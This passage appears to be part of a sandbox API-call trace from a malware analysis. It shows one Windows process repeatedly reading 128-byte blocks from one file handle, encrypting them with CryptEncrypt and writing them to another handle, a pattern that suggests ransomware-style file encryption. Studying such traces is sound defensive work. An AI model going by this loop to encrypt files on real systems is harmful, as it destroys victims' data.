lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.676] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.676] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.676] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.676] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.676] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.676] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.676] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.676] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.676] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.676] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.676] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.676] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.677] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.677] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.677] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.677] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.677] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.677] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.677] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.677] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.677] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.677] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.677] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.677] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.677] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.677] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.677] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.677] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.677] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.677] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.677] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.677] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.677] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.677] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.677] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.677] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.677] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.678] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.678] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.678] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.678] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.678] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.678] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.678] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.678] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.678] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.678] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.678] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.678] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.678] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.678] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.678] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.678] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.678] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.678] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.678] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.678] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.678] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.678] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.678] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.678] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.679] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.679] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.679] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.679] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.679] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.679] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.679] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.679] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.679] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.679] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.679] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.679] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.679] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.679] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.679] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.679] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.679] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.679] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.679] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.679] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.679] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.679] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.679] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.679] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.680] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.680] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.680] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.680] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.680] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.680] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.680] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.680] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.680] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.680] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.680] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.680] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.680] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.680] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.680] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.680] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.680] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.680] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.681] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 